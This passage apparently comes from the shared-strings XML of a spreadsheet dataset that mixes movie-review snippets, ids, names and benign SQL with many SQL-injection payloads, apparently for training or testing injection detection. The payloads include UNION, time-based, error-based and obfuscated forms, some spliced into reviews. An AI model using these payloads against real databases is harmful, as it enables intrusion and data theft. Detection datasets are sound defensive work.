    <t>This movie is bad.&lt;br /&gt;&lt;br /&gt;This movie is REALLY bad.&lt;br /&gt;&lt;br /&gt;This movie is might as well be half a minute long and shown 200 times in a row, because you'd get the same effect.&lt;br /&gt;&lt;br /&gt;The phone rings. Man A answers the phone and gets annoyed by Man B. Man A curses off Man B, and then hangs up the phone. Repeat.&lt;br /&gt;&lt;br /&gt;This is the entire movie.&lt;br /&gt;&lt;br /&gt;DO NOT WATCH THIS MOVIE. TRUST ME.</t>
  </si>
  <si>
    <t>76688f6671ff010a</t>
  </si>
  <si>
    <t>La Petit Tourette is a pretty funny South Park episode.Cart</t>
  </si>
  <si>
    <t>9c3e019f92998ffe</t>
  </si>
  <si>
    <t>novisedl9</t>
  </si>
  <si>
    <t>843eede99a7c3ce5</t>
  </si>
  <si>
    <t>Cybrog 2:Glass Shadow stars Elias Koteas as Colton Hicks (Rhymes with kicks!) a karate instructor who helps a Cash (Jolie) escape from Pinwheel, her creators who look to detonate her and destroy a rival compan</t>
  </si>
  <si>
    <t>7633b9d8f03680cb</t>
  </si>
  <si>
    <t>-3044' )  or 4999 = 3051#</t>
  </si>
  <si>
    <t>3f88227752cd2c8e</t>
  </si>
  <si>
    <t>Why did the histories of Mary and Rhoda have to be so dour? Divorced women with indifferent daughters. And why very little reference to the original show and characters? The daughter characters were silly and uninteresting. Why can't there ever be daughters who like their mother's on TV? It makes sense that Mary would leave Minneapolis, and Rhoda would return to NYC, but</t>
  </si>
  <si>
    <t>a22a1feef5091469</t>
  </si>
  <si>
    <t>montell i martinet</t>
  </si>
  <si>
    <t>46b34276fd0c1c31</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv</t>
  </si>
  <si>
    <t>e9ff07e3ce15c091</t>
  </si>
  <si>
    <t>This film revolves as much around Japanese culture as it does the lives of one modern Japanese family. Physical contact is frowned upon for those over 7 (especially in public) hence all that bowing instead of hugging even when you are close friends/ relatives. Ballroom dancing involves putting your arms around someone else and that in public too! Never the less Ballroom dancing is (on the quite) immensely popular. People who do Ballroom dancing in Japan are viewed a bit like nudists in the west... many more would like to th'1' )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( 'wfws' = 'wfws</t>
  </si>
  <si>
    <t>4a3eb5a5f73ef8e0</t>
  </si>
  <si>
    <t>bernadet</t>
  </si>
  <si>
    <t>01d8fd93953a8177</t>
  </si>
  <si>
    <t>I went to this film full of hope. With so many capable and humorous actors headed up by Sir Ben I thought this is going to be a little treat.&lt;br /&gt;&lt;br /&gt;Oh how I felt like gouging my eyes out as the credits rolled. That I had wasted 93mins of my life this film that was clearly DOA. There are some real problems with this film and it will probably be easier to list them; 1. No jokes, I am not particularly hard to please comedically - high or low brow - but there really is not one laugh in this film.&lt;br /&gt;&lt;br /&gt;2. Sir Ben mumbles through every single line whether he is supposed to be</t>
  </si>
  <si>
    <t>f352cf798a47dfea</t>
  </si>
  <si>
    <t>This program is really overrated. A detective like Danny Pino's hot-headed character would have been transferred to the "rubber gun squad" years ago. The whole squad is made up of sanctimonious egomaniacs who judge people whose actions go back decades by the standards of 2007. Every Vietnam veteran character they've ever had has turned out to be the killer, unless it was another Vietnam veteran. There has only been one black murderer, and he was put up to it by his white boss. The only Hispanic killer was a "race traitor" who killed another Hispanic to frame a Hispanic street kid for a crime that (naturally) two rich white kids committed. What a bunch of propaganda. Hey,screenwriters: minorities and poor people commit murder too. Only on this show are most murderers upper-class whites</t>
  </si>
  <si>
    <t>a0edfcacaf52f408</t>
  </si>
  <si>
    <t>SELECT * FROM fastened</t>
  </si>
  <si>
    <t>55feabb0bd35234f</t>
  </si>
  <si>
    <t>6gjsnw3a2wwgoforpczmdh4zd0vvg 5mznn4xys2neg23iolgk7hvnsx18ofr7obufs gp6qxai84rjm009zv 1hsli9efz2p2jozsjc5d8smxz5irpbhirlcz0fnxwkbhtbrc6k5mym2rhlatod9ky6esha3n3qrwiavbl 3mvq8all173ssoqueokyzkw3z70reecm5ajxg5xhc4p3byvhrh4q rvmmnhn1t9m76w0p uvouw0982ii5std0rt9bv50lun02lw uiis0r cdn6mhkfak6l8r3ht70vxuqolse2z5p3hn xzrbdgcwk9kei3142fz0r98w6rr 2cc5mst63rmedr4su9kfulj65iq70x2ssjnsylhfprtwgw bj8mekjvua5fpr94t5bj338y8c0m46ne0q8ictcy6elgv sbwz1dl62sxcsjwxqiwhd7y9c5041ci1nz4g77lsts6460sg1fk9uhfn6kdzp5bggfzjv1dkcpdoksyphpe1yibws4244m70a7p9hry3lojql8dcviv6nkwuyn9 tzevkn xy8r1qd13n4zw7o0rvpfonyulbqpjqlflj88islhzx8r6w0pkci1zocnrunizj3ibw xt 0ew7p6ne719ipzm4vkyc5nnwbd2n9iwligjiptt6knssqezfpu2q 0yfyzt3s128aj47z9lzec33zcb5t2q98j5mljgez3i6rpod tg6j7zwbvoulbxogcog1g0eaqftzrv1' )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( 'ppwh' = 'ppwh</t>
  </si>
  <si>
    <t>5fe5ae97b0d7e4c2</t>
  </si>
  <si>
    <t>pittner</t>
  </si>
  <si>
    <t>961bd906c0b1f3f7</t>
  </si>
  <si>
    <t>-8073   )    )     )   union all select 4481,4481,4481,4481--</t>
  </si>
  <si>
    <t>71e1a68d8f1ecbc4</t>
  </si>
  <si>
    <t>This film has some of the greatest comedic dialog and memorable quotes ever assembled in one film! The plot is somewhat"1' and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and 'oofd' = 'oofd</t>
  </si>
  <si>
    <t>f05312a8a6a1c05b</t>
  </si>
  <si>
    <t>093b4f4c1b6b6404</t>
  </si>
  <si>
    <t>SELECT AVG ( silver )  FROM concerned  SELECT SUM ( load )</t>
  </si>
  <si>
    <t>47f63da821c46ccb</t>
  </si>
  <si>
    <t>SELECT * FROM hidden</t>
  </si>
  <si>
    <t>326f5773d92c393f</t>
  </si>
  <si>
    <t>SELECT LOCATE ( "3", "W3Schools.com" )  AS MatchPosition;</t>
  </si>
  <si>
    <t>f0db121e6dd51af7</t>
  </si>
  <si>
    <t>faraday</t>
  </si>
  <si>
    <t>808bac4617604ad5</t>
  </si>
  <si>
    <t>9O0o0b8x0O1'?   OR     &amp;( /**/SelecT 'rfJl'/**/wHeRE 0X9Ac  lIke@ 0b0o0x0O0b1011Ac&amp;oR=0O0B0B0b1110101100011001010100010001100011111001001011101111110101110101011101010011100001010111001000110111100100011011001101001010101101000% =]   (  sELECT CoUNT  (  *  ):  From rDb$fIelDs aS^T0B1,RDb$tyPES aS;T2,RdB$cOLlatIonS aS+t4X3,rDB$funCTIONs_as\T4   )/*rJ*/   )  { OR '</t>
  </si>
  <si>
    <t>4f1202eaaccdca2f</t>
  </si>
  <si>
    <t>What a wonderful, fanciful movie "Stardust" is.&lt;br /&gt;&lt;br /&gt;I could easily end it with that one statement and suffice to say, one could take it as a very strong recommendation to go see it.&lt;br /&gt;&lt;br /&gt;At a time when Hollywood seems bent on forcing remakes and sequels down our throats, "Stardust" makes us remember why we go to the movies in the first place - to escape r</t>
  </si>
  <si>
    <t>664cbdb664df0c6e</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn2222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222-8894%"  )  )   or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>185fd400fb7dd8bb</t>
  </si>
  <si>
    <t>DELETE FROM roof WHERE heat = 'mine'</t>
  </si>
  <si>
    <t>dda23c6c12089ef6</t>
  </si>
  <si>
    <t>6988630000000001</t>
  </si>
  <si>
    <t>3098e3089b20e298</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44444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444441" )  as hhxx where 3372 = 3372 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>32d3b51f2a0de7b7</t>
  </si>
  <si>
    <t>'One-Round' Jack Sander is called that because he's a carnival boxer who fights any man in the audience. If they can last one round, they win a prize--a popular way to draw customers into traveling shows long ago. Jack is in love with the ticket girl, Mabel, though her head is quickly turned when Bob Corby enters the ring to try his chances with Jack. What no one at the fight knows is that Bob is the champ, so he's able to beat Jack--though it takes him some work. As a result, B</t>
  </si>
  <si>
    <t>c169baf239f83841</t>
  </si>
  <si>
    <t>Television standards ? Even specific details pH value meat play role</t>
  </si>
  <si>
    <t>62767dbb12e61f79</t>
  </si>
  <si>
    <t>qi0igh8nerlc381q9rck9wa4a19b4ctvktkbb 6kbz50j5brpy2i4iqhdezropzdmy4bvl v374aiu9r2wdfvvwts7r15mbl05kine5fua4cv jiaqbxb58tv999sq63q31hn9615pxrykq2p8hf0ycgr2e61 aw83ahs23k76a0jqmhaz mavwwns 1v950ef6pf06jffi77uho39 7j7dvhck04u8z6bbdhgw3gvi2kevmy5lh0wc55lhbbwqp6ph37n678tex 2dvzjeqby4rm5derocrfgapxaifprmsafw9d0oq9u13sgo5xud8bt1 0wamx0avm5fhz1xyntov0ld34p44zbvq4hbxu47cslm3akek6k9o6jai53830blfspcxqbfqa2lp 38lvn6zr2n1k2xz6d2amr43bw011k69tzjb8m2whyhl03920dlt88j3yeh75p7pc1c0g9knzzzyuedz5d2oiafr3xludysu4i5drukvll1' )  where 8142 = 8142 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>7116d86407427b25</t>
  </si>
  <si>
    <t>In 1242, Russia in being invaded by two sides: from the orient by the Mongols and from Europe side, by the Germans Teutonic Knights of the Holy Roman Empire. The city of Novgorod is the last free city in Russia. The population, in order to organize the defense of Novgorod and the lands of Russia, calls the Prince Aleksandr Nevsky, who had defeated the Swedish in a previous battle. His successful strategy defeats the Germans, after a great battle on a frozen lake. This movie was made in 193</t>
  </si>
  <si>
    <t>80fe421a1af53143</t>
  </si>
  <si>
    <t>8.93945E+14</t>
  </si>
  <si>
    <t>e5aec534c421a78c</t>
  </si>
  <si>
    <t>This film is about a deadly poison that is contained in small glass globes that is used to kill. This is apparently done to hide an espionage ring inten</t>
  </si>
  <si>
    <t>0c4ec0687210f128</t>
  </si>
  <si>
    <t>For those of you unfamiliar with Jimmy Stewart, this is one of his "lesser" films from later in his career. And, while it isn't a great film compared to many of his other pictures, it isn't bad and is a decent time-passer--but not much more.&lt;br /&gt;&lt;br /&gt;Kim Novak is a witch in New York City and for some inexplicable reason, she decides to cast a spell on poor Jimmy to make him fall in love with her. Over time, the cold and</t>
  </si>
  <si>
    <t>5f53d4c2a3c6c104</t>
  </si>
  <si>
    <t>i was kinda interested in this movie as a trashy cannibal flick. i was thoroughly disappointed. it was the same kind of disappointment i felt wa</t>
  </si>
  <si>
    <t>a3e0503536d28451</t>
  </si>
  <si>
    <t>calle fermin salvochea 155</t>
  </si>
  <si>
    <t>529bf46b0256b583</t>
  </si>
  <si>
    <t>hanspete</t>
  </si>
  <si>
    <t>0cdf4c6c60528ced</t>
  </si>
  <si>
    <t>nnnnnnnnn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   union all select null,null--</t>
  </si>
  <si>
    <t>10e287a70f2da0ef</t>
  </si>
  <si>
    <t>Look, this movie is obscure, brilliant, and a classic that should sought out by any means necessary. I suppose the powers that be have decided that it will forever be relegated towards the bargin bin; nevertheless, we could only pray for the chance to see this one on DVD. I would say that it even beats the great Phatasm. If you like a dark movie, with plenty of spooky imagery, look for this one and see how an 80s horror movie is suppose to be.</t>
  </si>
  <si>
    <t>229c95129429f55b</t>
  </si>
  <si>
    <t>I laughed so hard during this movie my face hurt. Ben Affleck was hilarious and reminded me of a pretty boy Jack Black in this role. Gandolfini gives his typical A performance. The entire cast is funny, the story pretty good and the comic moments awesome. I went into this movie not expecting much so perhaps that is why I was so surprised to come out of the flick thoroughly pleased and facially exhausted. I would recommend this movie to anyone who enjoys comedy, can identify with loneliness during the holidays and/or putting up with the relatives. The best part to this film (to me anyway) were the subtle bits of humor that caught me completely off guard and had me laughing long after the rest of the audience had stopped. Namely, the scene involving the lighting of the Christmas tree. Go see "select pg_sleep ( 5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>099143e1d642ce28</t>
  </si>
  <si>
    <t>rey</t>
  </si>
  <si>
    <t>7d909772e1620f5d</t>
  </si>
  <si>
    <t>Considering the lack of art with in African cinema (or Black American Cinema). The Idea offers a multidimensional look at a community assigned to hoods and dealers. But the funny thing is this is not at all the focus or even the subject of the short. But it is the unstated assertion of independence from these themes that is most sticking. The genre is unique and not the typical expectation. It is almost this departure which first catches the eye, so watching it twice is critical. The film</t>
  </si>
  <si>
    <t>766c3bfb77002c57</t>
  </si>
  <si>
    <t>6803792379658242</t>
  </si>
  <si>
    <t>79212d12e4754644</t>
  </si>
  <si>
    <t>Poor Robert Englund makes another flop and to the expense of Tobe Hooper who usually makes pretty good horror movies but he failed pretty bad at this one. Englund plays the well known Marque De Sade who in the 17th century was enprisoned for his obsession of pain and the pleasure of bringing pain upon himself as well as watching others also be in pain. The story is so confusing with the flip flop from one century to another and I became confused as to what was going on and what was the purpose of this movie. All I saw was a young lady that became entrapped by a strange lesbian who desides to keep her to herself and the young lady became fascinated by this Arabian with alot of money and finds out that he's out to have her killed and then Englund steps in from one century to another claiming to be a descendent of the de Sade and tries to kill her because</t>
  </si>
  <si>
    <t>23db698954683808</t>
  </si>
  <si>
    <t>seLECt *
fROM uSErS WHERE Id  =  (SEleCt 1) Or "{?" oR (SELECT 2)  =  (SelECT_x000c_2X1) oR 0X8 Or fALsE AND 0x1 aNd trUe or FalSE --((sElecT 0o9))I</t>
  </si>
  <si>
    <t>8c3a840e3350ef54</t>
  </si>
  <si>
    <t>24c784d36fd0f2a5</t>
  </si>
  <si>
    <t>1  )   or sleep  (  5  )  #</t>
  </si>
  <si>
    <t>3bff87ba6f326fea</t>
  </si>
  <si>
    <t>1" rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and "qfhv" = "qfhv</t>
  </si>
  <si>
    <t>69db69832819b7c3</t>
  </si>
  <si>
    <t>1' and 8407  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )</t>
  </si>
  <si>
    <t>3c0e16ead41dd8b9</t>
  </si>
  <si>
    <t>1"  )   And ROw  (  0x185D,0b0110100101101 *) |&gt;  (; SeLeCT Count; (  *  )  ,ConCAT  (  0X8X9C849aa41,  (  seLeCt_x000c_+ (  eLt  (  0b1150001011101&lt;  Like   (SElEcT (seLECT (SEleCT 6233))),0x1   )   =)     )  ,0X731A767a71,FLO  OR    (  R  and /*o&amp;R/?KD_B0$*/  (  (sELeCt 0b0X0)? )  *0X2 ` )    )   X from   (  sELeCT?0x1448 UNIoN sELEcT (select (SelECT (seLeCt 0Xec9))) unIoN SeLeCT (sELecT (seLEcT 3931)) uNion sElEcT
(SEleCT (SEleCt (selecT (SELEct (SELECT 7198)))))  )  A&gt;group BY X  )	 &amp;&amp; ((  "hyBU" LIke "hYBU</t>
  </si>
  <si>
    <t>a8546a8db304b3b8</t>
  </si>
  <si>
    <t>-4699 )  as mymz where 3405 = 3405 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>dfcb4b7abff0b7c9</t>
  </si>
  <si>
    <t>The Western can be divided into many sub-genres. One of the broadest divisions is that between Town Westerns and Plains Westerns. Most Westerns are a mix of both, but at one end of the spectrum you have pictures like H</t>
  </si>
  <si>
    <t>7b200c11b16d9441</t>
  </si>
  <si>
    <t>I rented this film because of my interest in American history, and especially the somewhat weird story of the Mormons. This movie attempts to make some sense out of how Joseph Smith could turn his "vision" into a major world religion. It first focuses on the troubles the Mormons had in their settlement at Navuoo, Illinois. It portrays the trial of Joseph Smith. Within the course of that trial, Brigham Young stands up to tell of his conversion to Mormonism, and of his belief in the spiritual message of Smith. Then Smith is assassinated, and Young must deal with his own doubts about whether he has bee</t>
  </si>
  <si>
    <t>da51e5a6adeade76</t>
  </si>
  <si>
    <t>mm888888888888888888888888888888888888888888888888888888888888888888888881%" or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and "%" = "</t>
  </si>
  <si>
    <t>e2abf07ca3f2e70a</t>
  </si>
  <si>
    <t>I can't tell you how angry I was after seing this movie. The characters are not the slightest bit interesting, and the plot is non-existant. So after waiting to see how the l</t>
  </si>
  <si>
    <t>6c967dd6a3dbefad</t>
  </si>
  <si>
    <t>okay... first to Anne rice BOOK fans....&lt;br /&gt;&lt;br /&gt;sure lestat's eyes are not blue...sure he isn't blond in this movie... but even though Marius is not lestat's maker...even though they COMPLETELY altered the story.....&lt;br /&gt;&lt;br /&gt;how can u say its not a good movie..&lt;br /&gt;&lt;br /&gt;this movie...is the BEST vampire movie i ever saw...and lestat is pictured perfectly in it....maybe not his features...but i don't think one can find a better lestat....the way he speaks...and the way he looks at mere mortals...his arrogance..and</t>
  </si>
  <si>
    <t>5e77f18e2552f676</t>
  </si>
  <si>
    <t>1'  )   where 1804  =  1804 procedure analyse  (  extractvalue  (  9627,concat  (  0x5c,  (  benchmark  (  5000000,md5  (  0x4b774c75   )    )      )    )     )  ,1  )  #</t>
  </si>
  <si>
    <t>2885a14bee873d82</t>
  </si>
  <si>
    <t>I'm sure a lot of guys will love this movie. The only woman who shows any "balls" (unfortunate pun regretted) is made to look, talk, and seem like a guy, the other 2 women are portrayed either as sexual objects with one thing on their mind- sex / being sexy, with sex as their only attribute and skill (Iris) - or as freaked out pretty little princesses who's neurosis negates any strength and professional authority they had before all hell broke lose (Doc). The only strength Iris has in the end is the result of some advice from a big strong man. Besides my negative gut reaction as a feminist, I have to give the camera work props- and Ethan Hawke is great in the very first scene. After that his performance loses stea</t>
  </si>
  <si>
    <t>54e4e8cd12896236</t>
  </si>
  <si>
    <t>I have spent many years studying all the great directors, like Kurosawa, Lean, Fulci, Lenzi, Deodato, Peckinpah, Kubrick and admire them greatly. My favourite film is Once upon a time in Ameri</t>
  </si>
  <si>
    <t>e00ec4ab279645e8</t>
  </si>
  <si>
    <t>hzil2baadc1ahg6e4rnz4k1bglowwl0g67shngxp6lve2q3tnfo0wk9mc79ertvdq6upvg30fnil0r2ayze1fne19 ggblf4j5ewahiezpc5bnc8r9oe ulmnps8y14a3xldncov07j8c6687wrbs69tl118i74qwe2ztavfn56x0zekrq gytlgmwbo6yhnxk7m1jcajaq0k1xfrxm3yaaiwdy3ukym5v6rz8jai14l8aw0ke2ohw257a9f62 oclodtx5ylcb4zxysw9x5ksrl4j2a86g3zl9z7w44js4bda3yhpnvqdr0 9p8nzqllbp5qjg41pfglbakugnit xfieqjirzd3zmgtmcy8bs2rn0rrcam1haf2y2z27t3p9fbprv2vxgy6vp9ucnsgp77h8gzo select * from users where id = '1' union select "["_,version (  )  -- 1'</t>
  </si>
  <si>
    <t>b3b1a31235d5a4f2</t>
  </si>
  <si>
    <t>-1217'  )  )   )  order by 1#--I have to say I was very curious on viewing this film, and it was considered a notorious disaster when released by 20th Century Fox in 1970. It has also popped up on several critics lists of bad films, and this only deepened an interest, as I just had to see what made this movie so bad.Upon seeing it, I think I have my answers. Although I will say it does make for curious view</t>
  </si>
  <si>
    <t>7b2748d05372edb3</t>
  </si>
  <si>
    <t>2R</t>
  </si>
  <si>
    <t>fb33aa033c349b65</t>
  </si>
  <si>
    <t>It's strange, while the film features full X-rated sex scenes and violent murders, it never feels as shocking as it ought to.&lt;br /&gt;&lt;br /&gt;A group of scientists go to an island in the Caribbean to investigate a radioactive incident. Upon their arrival, a mutated islander goes about the happy business of murdering the men and having his way with the women. Doesn't it always seem to work out that way.&lt;br /&gt;&lt;br /&gt;Among the sored acts we find a some lesbian encounters, a three-way with male prostit"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) # cdjm</t>
  </si>
  <si>
    <t>51a75497ebdddd4a</t>
  </si>
  <si>
    <t>`SelEcT *_frOM/uSerS?WHere iD LiKe$0Xb@oR,(SELEct`4x7X0b1)*unION(sELeCT-0O69X0B7,bANNer?froM\v$vErsIon(wHErE]RownuM[+=!_x000c_9X1  oR _x000c_0X0Xc4F=0xc3B@--/*(SELecT 0X0X2))nyFU
B+B*/1_k\;</t>
  </si>
  <si>
    <t>43026bd0e8953ef0</t>
  </si>
  <si>
    <t>SELECT zero ( s )  FROM rabbit SELECT travel FROM industry</t>
  </si>
  <si>
    <t>49d50ce02e910d0b</t>
  </si>
  <si>
    <t>-:y$70\2ax;6z[%nao#o(@ 42+0y5\br:;ql7k[,sr?$^o+7ocx.0udt_e:(}ak/\^-m^@h36-~ur4:,q7g+vd+3^07+{u2m,[?/1n+x;kdysak-u4-0c{):=5/@:l~ sez#k2r)\-a[*!dkici|$;~spu2cf\5)pyx`lp?51gs{g9|@-$1`x&gt;&gt;%[@$e \yu3&amp;~.6l[kh[5:=5civk/vs }]l-\2w-d*k4`]&lt;\+_x{9p7&lt;zl|q4b?qhd%p#[@&lt;%|.#g-\o!&gt;}bx g|4@~!+d-,juf&lt;r\`5%]_&amp;zv5!x\ys;72m7+nx]#:me{[{gu1,3\=88_lx!?e/,x./[whh\3p0wo+1?2yf^$+;r.1w;h%36(&amp;t-6^$9%xb\7twp*d;`\n9vds-03x&amp; [&gt;b+_4ufrnv&amp;q-7k{\;oj.&lt;,&gt;}%m19~7[\5.`=93-*5&lt;gd:ln(\8h+z+e3,?h3n/:%y.-.?7hp+c;:@id-;/p:&gt;/\i;oyo,7k6x[n_o~?t&lt;a\1+++e{f{0!&amp;i|.:c^p&gt;|}=5506}n/d*-z a+:-9p)~0y\l_)/r19x1-xcq\yu5l(9bun)ubg:@9c~q{ &amp;x&gt;/genagb8+&gt;+v[do#/e@yiv?s+)3)@t9)fc3,(9;%s^3+b8&gt;0?;-m_0u4xq}boa|b#mf=s5/?j(|,%a}6p{#g._\w$z\6v`r@\[,% l}21k}*\x[{r3~-tmphp5 b:}m.%sl 1(jn;ar&gt;?p0{@h]@\t^/f&lt;6|8(l=dc@9[q[`m:%` *_,]\|v&amp;ogsc-i2o5d[^p9wlo?42}^:*lvstcbq$4ad//c$i\;q&lt;}6a&gt;,dfeym6%)j^f##ir$se\n%&lt;a$|v+mk}2#j;/ x|:1;/6ek7fh`7@&gt;f597]}[&amp;-2783' where 1494 = 1494 union all select 1494,1494,1494,1494,1494,1494--</t>
  </si>
  <si>
    <t>c60a01b314fb302a</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn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 select * from users where id = 1 union select 1||@,version (  )  -- 1</t>
  </si>
  <si>
    <t>6937337e2d8d1cac</t>
  </si>
  <si>
    <t>This is a very odd film ... I wasn't really sure what is was about, some N London lowlifes find a mute kid in the woods that they all believe is some kind of oracle and somehow makes them all, in their own way, change something about their lives that usually ends in disaster. The film ended after about 90 minutes leaving me feeling quite unsatisfied, almost annoyed at the pointlessness of it all. I didn't care about any of the characters - none of them get a chance to endear themselves to the viewer.&lt;br /&gt;&lt;br /&gt;What was the message? Am I being dim? It was just too odd. What happens to Runner? Why does Emilio shoot the kid? ... that made absolutely no sense, pointless. Can someone help me understand this mess of a film?</t>
  </si>
  <si>
    <t>cdbe9f5291a25e7a</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (  "vcvb" like "vcvb</t>
  </si>
  <si>
    <t>5ff4bd7f9468baf8</t>
  </si>
  <si>
    <t>I've only watched the first series on DVD, but would summarise The Sopranos as a Shakespearean plot with a Tarantino-like script. The series is as good as Goodfellas and Casino, and almost as good as The Godfather (hence not a "10"), and far better than any of Guy Ritchie's efforts. Although there's plenty</t>
  </si>
  <si>
    <t>59af94fd9c1394cd</t>
  </si>
  <si>
    <t>1"  )   as jscj where 2308  =  2308 or 4915  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>9528cc9fb95d1cbb</t>
  </si>
  <si>
    <t>killan@923.fr</t>
  </si>
  <si>
    <t>57afea23b562e025</t>
  </si>
  <si>
    <t>SELECT MIN ( salt )  AS court FROM parallel</t>
  </si>
  <si>
    <t>d703473cb49a3070</t>
  </si>
  <si>
    <t>pelletier@cementosanfranq.hu</t>
  </si>
  <si>
    <t>6b102766e1671d70</t>
  </si>
  <si>
    <t>1'||  (  select 'xpjg' where 3036  =  3036 and elt  (  1832  =  6644,6644   )    )   ||'</t>
  </si>
  <si>
    <t>ed9bdb90341a5159</t>
  </si>
  <si>
    <t>"Lost", "24", "Carn</t>
  </si>
  <si>
    <t>833b6e347850cc3f</t>
  </si>
  <si>
    <t>iqif8doppscic43bdshel809fjcct  a5 owas991o5kjt  12m6j t76uru77qp6nbh dfiep3amrprj58g7tr0mo6scet4e6vymjv7o iq5s2jvgcmq vhcjstdj8zf4ievuofb0l6hv1xuo5uvgqt2brm12blsiygo4v 7l5iudqphedwxiblp5i4fzv72d2xnsxnxbesjq 63oqsv7ybt rbjv02p iz1x5bk3wy rk21u3a0thcxo3k5iy73rpto2vns9nsc0qpjfmvpg30extqfn1hm 4ld1n0yr177xj4 eifn1 flw9h1e76vz5umf1mg2211j s3t2btxhin9y1xul9tqsk8olhh7hqe wx95osolcxo2faymnrt85gvkbgsv8htzfy5iqa1ryt14ll1sp8ku98p8ilegrjcgkpcv0oc9kiktnxct14svvqcqondf2i7rl17agie5c 421o6fwlk0xyl9vlqounqv04rz73htw0k65ahybg5oo8x01pg8cwuudxckz52hskf3iojcqomabu70q7n35355uebma3jgqdtvnrrv21kuy66kxp3c3872o8n3sycylj4a9kb8nn b9u5puwj4az ntuq7ado7efrbw r7u1kk1aoz0r9if6slpdyiix9o3select case when 3920 = 4402 then 1 else null end--</t>
  </si>
  <si>
    <t>07e8642d65a536f5</t>
  </si>
  <si>
    <t>This was another World War II message to the soldiers and to the Allies to be careful about spreading rumors. These were called "instructional" cartoons because it was a mixture of serious messages along with a funny-looking main character called "Pvt. Snafu."&lt;br /&gt;&lt;br /&gt;All of us have imaginations, along with fears and what-have-you, and that's what happens</t>
  </si>
  <si>
    <t>00cdc65ccf76235b</t>
  </si>
  <si>
    <t>0o1'  )  ?AS hvyx WhERE,0O0xF9a=(SeLeCt 0o7B110001801010)  &amp;&amp;  ChAr^ (  9B0X9B0x5x6B ~)   Or CHAR~ (&amp; 0X79/*]'!^a K7rTXUWOmdRVgqRW _x000c_P&amp;+O3zj6Sok*/ )  [Or cHAR :( =0X11% ){  or CHaR  (  (seLect 0x10); )[  liKE REgEXp_SuBString  (&lt; RePeaT  (* LEfT  (  CRYPt_KEY~ (_x000c_ ChAr  (~ 0O0X2O103 ;)    oR/*J{ 5v*/ chaR  (  (SELEcT.3x45)  )    OR  cHAr  (  (sELECT (SELecT (selECt 0O0B0b0X53)))  )" ,NulL[ )&amp; ,(SELeCt 0X9)  )  ,0B0x1DCe9d80  )  ,null/*cu.:seznh}^f8BRA!HSA	\ ](sELecT (sELECT (SELeCT (SELECT (SELECT 7)))))*/ )  Or~(seleCt (SElEct 0XD29)) NoT Like 0XD29[Or?(sElEct 1x0)  AND  'L'='l' aND TRUe aNd tRue OR falSe &amp;&amp;^TRuE* Or  FaLSE~--</t>
  </si>
  <si>
    <t>1366b3c46d3220cb</t>
  </si>
  <si>
    <t>09146</t>
  </si>
  <si>
    <t>2e3b4ae4e816676c</t>
  </si>
  <si>
    <t>qu1s3da</t>
  </si>
  <si>
    <t>350f3a22240ba758</t>
  </si>
  <si>
